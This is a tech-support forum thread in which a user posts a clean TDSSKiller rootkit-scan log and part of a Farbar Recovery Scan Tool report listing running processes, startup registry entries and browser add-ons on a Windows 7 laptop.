12:17:23.0031 0x1aa8 [ 0BC2A483C132C5DFDD9EB1DF41594AEF, D38BCBF0EBBD44B83D1D0EBC7B2FE6DCEB08292282FCCC473DF58D452429EC84 ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\libegl.dll
12:17:23.0031 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\libegl.dll - ok
12:17:23.0035 0x1aa8 [ AB2B0473AE5C61EFE5BB8796D6631E51, B467E5C5AE01FDC40F927611C8CAA62A874B8DBE5897EF0E1300E97F3A67F365 ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ppgooglenaclpluginchrome.dll
12:17:23.0035 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ppgooglenaclpluginchrome.dll - ok
12:17:23.0039 0x1aa8 [ 08DD4407C37B2407EF2C87DF1558BD5C, B22A65E2E88254B8D1D73BA0C9CF7B4D1A6050390F1BC9A8196F4D649CB98976 ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\libpeerconnection.dll
12:17:23.0039 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\libpeerconnection.dll - ok
12:17:23.0043 0x1aa8 [ 7892D1F256CB6EEF313CA5A084A21213, F301F24D56A9DF1FFDE1091EDB6066D4C31AC13C3725B972581A6CA7FB4943A8 ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ffmpegsumo.dll
12:17:23.0043 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\ffmpegsumo.dll - ok
12:17:23.0047 0x1aa8 [ 9B1FD54817BB5ADF3E923DF57DD51F41, FDCF3C082940C9431527F83274C0B5B82570DDB5C431F3CAFD03FE71F5165120 ] C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk\2014.7.0.47_0\npcoplgn.dll
12:17:23.0047 0x1aa8 C:\Users\Hewlett Packard\AppData\Local\Google\Chrome\User Data\Default\Extensions\mkfokfffehpeedafpekjeddnmnjhmcmk\2014.7.0.47_0\npcoplgn.dll - ok
12:17:23.0052 0x1aa8 [ F055C91A961601B8D50EF2976145AEE6, 32F22DB0717EE7B5D731F1652927B7062BCE84A912C7C25B2942369A9D49A2A6 ] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll
12:17:23.0052 0x1aa8 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll - ok
12:17:23.0056 0x1aa8 [ 7E2B763CF671ADB558D5F7110889D469, 9B221926165A8C577994D2992B5410BD9699E41BF4B92241624B7C69B5EB8707 ] C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL
12:17:23.0056 0x1aa8 C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL - ok
12:17:23.0059 0x1aa8 [ 7B882AEBC5F6DBEA4E0361C0FC3E36D4, 97E18C7997F1394AC5CCA44AC287603B427AC1D55E3C5336B38E8B375B638635 ] C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL
12:17:23.0060 0x1aa8 C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL - ok
12:17:23.0063 0x1aa8 [ 1E5E8C84DE796A01D1D46E3A660690F1, E3BB0D796CD562430FD14EBDDE1B0A6048742898139CCF24843F7CA95B1E4320 ] C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll
12:17:23.0063 0x1aa8 C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll - ok
12:17:23.0068 0x1aa8 [ 2E0C2F405813FAC925EE89CF0F33B90F, 0B93CAC383706902EB3CBE3A65C1CCF331C1CAB9D5EFE0AB89FFAEBA40904A05 ] C:\Program Files (x86)\DVRClient Plug-in\npDvrClient.dll
12:17:23.0068 0x1aa8 C:\Program Files (x86)\DVRClient Plug-in\npDvrClient.dll - ok
12:17:23.0072 0x1aa8 [ 785105A23650755A8F7A72405EB0D923, 28B0BFC6F46AF51197BE0549F9DF8A9F44F2ADE33359AFE7E8EDF2D1F69F4F64 ] C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll
12:17:23.0072 0x1aa8 C:\Program Files (x86)\Google\Update\1.3.24.7\npGoogleUpdate3.dll - ok
12:17:23.0076 0x1aa8 [ 290A0130C74ADCD4546BC6900D1665D9, 42D2AF4A079BCDBEBC1579130428AAE6B667BA7D291536885A1F6C3AB2462DAC ] C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll
12:17:23.0076 0x1aa8 C:\Program Files (x86)\Java\jre7\bin\dtplugin\npdeployJava1.dll - ok
12:17:23.0080 0x1aa8 [ 025BBEF5A248B09BDC6684747F6EB5BC, EF90434D022537329D081A38B54834D69A45767A878621C8560D6ACB0161FB1C ] C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll
12:17:23.0080 0x1aa8 C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll - ok
12:17:23.0084 0x1aa8 [ 0CA4180B21C6B728578F3B0433BB740E, 2110B88ED2BD706C048D7DA25776D1DD90100B37C2F5E80BE854D8E369E00BF5 ] C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll
12:17:23.0084 0x1aa8 C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll - ok
12:17:23.0088 0x1aa8 [ BA72CFC2BF952DA409A953E89D6FE2CD, C5442641A00732D7D9EFF511B02FA080F59CF19FA909FF79CF9E70808D39A235 ] C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll
12:17:23.0088 0x1aa8 C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll - ok
12:17:23.0092 0x1aa8 [ 0A1FF0B674E2F268799442A434A63BB3, D7E2C21606545ECDA65EC8ED2557BCA0CEC87F5F721476FD33F9895FDAFEE0C0 ] C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll
12:17:23.0092 0x1aa8 C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll - ok
12:17:23.0095 0x1aa8 [ 947C6C90CFB655A8636E9D6B84E3CFB2, 06CB1AAC98EFE336F6192E7F201E4BD0DF2DAC8683614E57E4C739D1AD7E9CB0 ] C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjninstallplugin_2.6.118.8.dll
12:17:23.0096 0x1aa8 C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjninstallplugin_2.6.118.8.dll - ok
12:17:23.0099 0x1aa8 [ B2028D24E6CEF1EF7D5075F58DA71D09, EFD12CE43B4D8A4C1101479062E395780207EDB0F7AA92B4558517988B4D5CF1 ] C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjnplugin_2.6.118.8.dll
12:17:23.0100 0x1aa8 C:\Users\Hewlett Packard\AppData\Roaming\Blue Jeans\bjnplugin\2.6.118.8\npbjnplugin_2.6.118.8.dll - ok
12:17:23.0104 0x1aa8 [ F556A64AB2DB1BD834E7C89CE211516B, 3747191A91F3AB8B9C4D67E7BC785D7FACE00C42289D8A2F55E2F203B524957F ] C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll
12:17:23.0104 0x1aa8 C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll - ok
12:17:23.0108 0x1aa8 [ 01D93217A9EE48DD37072B671378CC9C, 8A684D9DB072E1A276F182138265CAB1DC330BD19820E3BD4373AC8E1746347A ] C:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll
12:17:23.0108 0x1aa8 C:\Program Files (x86)\Microsoft Silverlight\5.1.30214.0\npctrl.dll - ok
12:17:23.0112 0x1aa8 [ 3151567F78FE31DE70EF6054DC212B0E, 02DD0EC8CC1914E9BE75F05DE7463DDBFD103DA4D9FA3A9CC3A943E8B4A44C4F ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\couictlr.dll
12:17:23.0112 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\couictlr.dll - ok
12:17:23.0117 0x1aa8 [ AF9343F28D6125ED7C47ED2EC04D0444, 81D3B7F8558C6C79F624EB7A92BFDE61D388179516C68BD4E331590E986416E8 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cowpplg.dll
12:17:23.0117 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cowpplg.dll - ok
12:17:23.0121 0x1aa8 [ 95B34E2BF1C3BB294064D6EC2B8BB0B0, 17F3831A3325BF4F4507C1DCEAEFD58E812808DDAC75B0DF5B3C20C5E9433BA1 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cosfshre.dll
12:17:23.0121 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\cosfshre.dll - ok
12:17:23.0125 0x1aa8 [ 245C5D6B2D4201189EC748C981B00211, 680BC0F206B6A9355B26A21D21BE55B98B77074DA05DFABA91F53EB8253F0753 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coidsafe.dll
12:17:23.0125 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coidsafe.dll - ok
12:17:23.0129 0x1aa8 [ 3C06536A9AA332E9E0CEBDE5A596822A, 308F92C0F82AB582B4F8CE917B7CFC1ABDE802F98C348664033F5F1706D1F599 ] C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDPROV.DLL
12:17:23.0129 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDPROV.DLL - ok


----------



## raphael100 (May 24, 2014)

12:17:23.0133 0x1aa8 [ 0C15DB6FF927935F0ECA52FEEA40E6C2, BF3FB9D11E3ABBAB756530A3592177ED775E40F213217F3CD7487D8F0A819012 ] C:\Program Files\Common Files\Microsoft Shared\Windows Live\wlidcli.dll
12:17:23.0133 0x1aa8 C:\Program Files\Common Files\Microsoft Shared\Windows Live\wlidcli.dll - ok
12:17:23.0137 0x1aa8 [ 489B8B03169976E3E772386BE2B5BA6F, 96B6828F2A721D196225428E4E71DEED2439571750E9EE297E93A487C1BA3865 ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\diarkive.dll
12:17:23.0137 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\diarkive.dll - ok
12:17:23.0141 0x1aa8 [ B8F6293E25184EBFD0BB031FC8469C7B, 28DA8E7A9039AD800A74E9504B7DE4C814761F2AD520C61536986AF93B530B4C ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symhtml.dll
12:17:23.0141 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\symhtml.dll - ok
12:17:23.0145 0x1aa8 [ E56BB6F83D93414B628E158CDE81C8EE, 3E832EB87D1AC5FC55D3264D8EF71EE24B2B9EC0DB41DE97A08F1DA96471CCFE ] C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coparse.dll
12:17:23.0145 0x1aa8 C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coparse.dll - ok
12:17:23.0149 0x1aa8 [ 751D8878D296DFDC0A36B5958E97EFD6, C19E0B5A0B75F1DDCF1D7BFF1EF25D66D689F0461EE10AFC2DDED6EDD66A5393 ] C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\PepperFlash\pepflashplayer.dll
12:17:23.0149 0x1aa8 C:\Program Files (x86)\Google\Chrome\Application\35.0.1916.114\PepperFlash\pepflashplayer.dll - ok
12:17:23.0153 0x1aa8 [ C140F86932B5B61F54A4D836E2D34AB2, 94821597EC70F27BF11A747D5EED474C57F389F20A2E0C3F1D0CB3F00974A53B ] C:\Windows\SysWOW64\ksproxy.ax
12:17:23.0153 0x1aa8 C:\Windows\SysWOW64\ksproxy.ax - ok
12:17:23.0157 0x1aa8 [ 9C67F6BBDA3881CFD02095160CF91576, 6CE97C6F0AD8BE183DE935A7AAB7D46821E8DE9E55A4BFF54ACB49D056826A94 ] C:\Windows\SysWOW64\ksuser.dll
12:17:23.0157 0x1aa8 C:\Windows\SysWOW64\ksuser.dll - ok
12:17:23.0160 0x1aa8 [ 4DDACA8A66B95ABA02812FF3C13DE198, FC14FA85367B29A5DA6479D198B9FA1D9A41C965685F51D5F0166D72A9F4668E ] C:\Windows\SysWOW64\vidcap.ax
12:17:23.0160 0x1aa8 C:\Windows\SysWOW64\vidcap.ax - ok
12:17:23.0164 0x1aa8 [ 630A31F277349109299E590856A4B004, E686938BE16163976BA048C19E0F23F27CFFBDEB044C0C038176BA3435C67C0B ] C:\Windows\SysWOW64\Kswdmcap.ax
12:17:23.0164 0x1aa8 C:\Windows\SysWOW64\Kswdmcap.ax - ok
12:17:23.0167 0x1aa8 [ DC6612A9EE015A36BA2A27BC9CC12537, F4456A3E4028BE3BDE46363290CCC1E8420034A122596D86272CE4B554C78DB5 ] C:\Windows\SysWOW64\mfc42.dll
12:17:23.0167 0x1aa8 C:\Windows\SysWOW64\mfc42.dll - ok
12:17:23.0171 0x1aa8 [ 7D34AF98A706230CC2DEDFE0CABF87AB, 93237B839C2BC6E84C2C675BB211CA0FB781B348A033EF648A9AA5BDAC1EFDAE ] C:\Windows\SysWOW64\odbc32.dll
12:17:23.0171 0x1aa8 C:\Windows\SysWOW64\odbc32.dll - ok
12:17:23.0175 0x1aa8 [ ABA457BFC7EC0B5E130B2F1E0F549DFF, C944C75C351A276952D0A869F9ED3DF8674E9479797EE7B03D13E8FDCDEB2DC4 ] C:\Windows\SysWOW64\odbcint.dll
12:17:23.0175 0x1aa8 C:\Windows\SysWOW64\odbcint.dll - ok
12:17:23.0178 0x1aa8 [ 81252AA3B13743020BCF2089A5A0D911, BFFB1A5917EC1EDAF6B58EAFD888575299365D09C734FACF5A7D1843680DDFD8 ] C:\Windows\System32\wscinterop.dll
12:17:23.0178 0x1aa8 C:\Windows\System32\wscinterop.dll - ok
12:17:23.0181 0x1aa8 [ 218A400108F280428FA22282D3268BBC, 7712687ABAEF6616E90AE5A321044C102E79EC23F4A1EAFB4278C93724873CB3 ] C:\Windows\System32\wscapi.dll
12:17:23.0182 0x1aa8 C:\Windows\System32\wscapi.dll - ok
12:17:23.0185 0x1aa8 [ DF50DAE4C547285E4997A0C61063B632, 24F1B66CD2C5188609F936E7F4947E29EB120C59731E7028285CE6791F31B580 ] C:\Windows\System32\wscui.cpl
12:17:23.0185 0x1aa8 C:\Windows\System32\wscui.cpl - ok
12:17:23.0189 0x1aa8 [ F9959237F106F2B2609E61A290C0652E, FCCC12E5AAE1773BF87B1C4BCE71D017DB1A5A7AC189559058EA1ECC72075A82 ] C:\Windows\System32\werconcpl.dll
12:17:23.0189 0x1aa8 C:\Windows\System32\werconcpl.dll - ok
12:17:23.0192 0x1aa8 [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] C:\Windows\System32\wercplsupport.dll
12:17:23.0193 0x1aa8 C:\Windows\System32\wercplsupport.dll - ok
12:17:23.0196 0x1aa8 [ 809AE7D4ACE06BBCF621E5C504BF6FC8, 0BAAB89FB57468F27446947D75CBD6DDFC92D9B8F040144A12656803B2F7BF65 ] C:\Windows\System32\hcproviders.dll
12:17:23.0196 0x1aa8 C:\Windows\System32\hcproviders.dll - ok
12:17:23.0199 0x1aa8 [ 41DF7355A5A907E2C1D7804EC028965D, 207BFEC939E7C017C4704BA76172EE2C954F485BA593BC1BC8C7666E78251861 ] C:\Windows\System32\wermgr.exe
12:17:23.0199 0x1aa8 C:\Windows\System32\wermgr.exe - ok
12:17:23.0203 0x1aa8 [ DD81D91FF3B0763C392422865C9AC12E, F5691B8F200E3196E6808E932630E862F8F26F31CD949981373F23C9D87DB8B9 ] C:\Windows\System32\rundll32.exe
12:17:23.0203 0x1aa8 C:\Windows\System32\rundll32.exe - ok
12:17:23.0206 0x1aa8 Waiting for KSN requests completion. In queue: 289
12:17:24.0219 0x1aa8 AV detected via SS2: Norton Internet Security, C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\WSCStub.exe ( 21.3.0.0 ), 0x51000 ( enabled : updated )
12:17:24.0221 0x1aa8 FW detected via SS2: Norton Internet Security, C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\WSCStub.exe ( 21.3.0.0 ), 0x51010 ( enabled )
12:17:27.0296 0x1aa8 ============================================================
12:17:27.0296 0x1aa8 Scan finished
12:17:27.0296 0x1aa8 ============================================================
12:17:27.0304 0x1aa4 Detected object count: 0
12:17:27.0305 0x1aa4 Actual detected object count: 0
12:50:57.0595 0x10c4 Deinitialize success


----------



## raphael100 (May 24, 2014)

TDSS did not find anything - so I just copied the log.


----------



## raphael100 (May 24, 2014)

Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 02-06-2014
Ran by Hewlett Packard (administrator) on HEWLETTPACKARD on 04-06-2014 13:09:52
Running from C:\Users\Hewlett Packard\Desktop
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English(US)
Internet Explorer Version 11
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/ 
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/ 
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(HP) C:\Program Files (x86)\HP SimplePass 2012\TrueSuiteService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
(Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Intel Corporation) C:\Windows\SysWOW64\irstrtsv.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Services\IPT\jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
() C:\Program Files (x86)\SMART BRO\AssistantServices.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(Symantec Corporation) C:\Program Files (x86)\Norton Management\Engine\3.2.2.12\ccsvchst.exe
(HP) C:\Program Files (x86)\HP SimplePass 2012\TouchControl.exe
(HP) C:\Program Files (x86)\HP SimplePass 2012\BioMonitor.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\nis.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
(Microsoft Corporation) C:\Windows\System32\mshta.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Hightail, Inc.) C:\Program Files (x86)\Hightail Desktop App\Hightail.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
() C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar1.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files\Hewlett-Packard\HP LaunchBox\HPTaskBar2.exe
(Dropbox, Inc.) C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Windows (R) Win 7 DDK provider) C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe
() C:\Program Files (x86)\SMART BRO\UIExec.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqWmiEx.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner64.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\BTStackServer.exe
(Broadcom Corporation.) C:\Program Files\WIDCOMM\Bluetooth Software\Bluetooth Headset Helper.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ==================

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2837288 2011-10-14] (Synaptics Incorporated)
HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1424896 2011-10-06] (IDT, Inc.)
HKLM\...\Run: [SetDefault] => C:\Program Files\Hewlett-Packard\HP LaunchBox\SetDefault.exe [43320 2011-10-01] (Hewlett-Packard Development Company, L.P.)
HKLM\...\Run: [Hightail Sync Agent] => C:\Program Files (x86)\Hightail Desktop App\Hightail.exe [7107640 2014-02-13] (Hightail, Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [HPOSD] => C:\Program Files (x86)\Hewlett-Packard\HP On Screen Display\HPOSD.exe [379960 2011-08-20] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [HP CoolSense] => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [1343904 2012-11-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [FLxHCIm64] => C:\Program Files\Fresco Logic\Fresco Logic USB3.0 Host Controller\amd64_host\FLxHCIm.exe [55536 2013-06-05] (Windows (R) Win 7 DDK provider)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [578944 2012-03-05] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [UIExec] => C:\Program Files (x86)\SMART BRO\UIExec.exe [156448 2012-05-11] ()
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [254336 2013-07-02] (Oracle Corporation)
HKLM-x32\...\Run: [Buffalo RUNONCE] => C:\BUFFALO\DriveNavi_HD-PUSU3-WR\%SRC_FILE1% /mode:RUNONCE1
HKLM\...\RunOnce: [NCPluginUpdater] - "C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" Update [21720 2014-05-27] (Hewlett-Packard)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [6160152 2014-05-20] (Piriform Ltd)
HKU\S-1-5-21-507872264-2459020571-1386800278-1000\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [20922016 2014-02-10] (Skype Technologies S.A.)
Lsa: [Notification Packages] scecli C:\Program Files\WIDCOMM\Bluetooth Software\BtwProximityCP.dll
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\WIDCOMM\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\Users\Hewlett Packard\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Hewlett Packard\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com.ph/
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
StartMenuInternet: IEXPLORE.EXE - C:\Program Files (x86)\Internet Explorer\iexplore.exe
SearchScopes: HKCU - DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}&rlz=1I7MXGB_enID590
SearchScopes: HKCU - {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKCU - {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = https://www.google.com/search?q={searchTerms}&rlz=1I7MXGB_enID590
BHO: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine64\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\x64\IEBHO.dll (HP)
BHO: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: Skype add-on for Internet Explorer - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer x64\skypeieplugin.dll (Microsoft Corporation)
BHO: Office Document Cache Handler - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: HP Network Check Helper - {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} - C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: Norton Identity Protection - {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\coIEPlg.dll (Symantec Corporation)
BHO-x32: Norton Vulnerability Protection - {6D53EC84-6AAE-4787-AEEE-F4628F01010C} - C:\Program Files (x86)\Norton Internet Security\Engine\21.3.0.12\IPS\IPSBHO.DLL (Symantec Corporation)
BHO-x32: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO-x32: TrueSuite Website Log On - {8590886E-EC8C-43C1-A32C-E4C2B0B6395B} - C:\Program Files (x86)\HP SimplePass 2012\IEBHO.dll (HP)
BHO-x32: Windows Live ID Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Skype Browser Helper - {AE805869-2E5C-4ED4-8F7B-F1F7851A4497} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll (Microsoft Corporation)
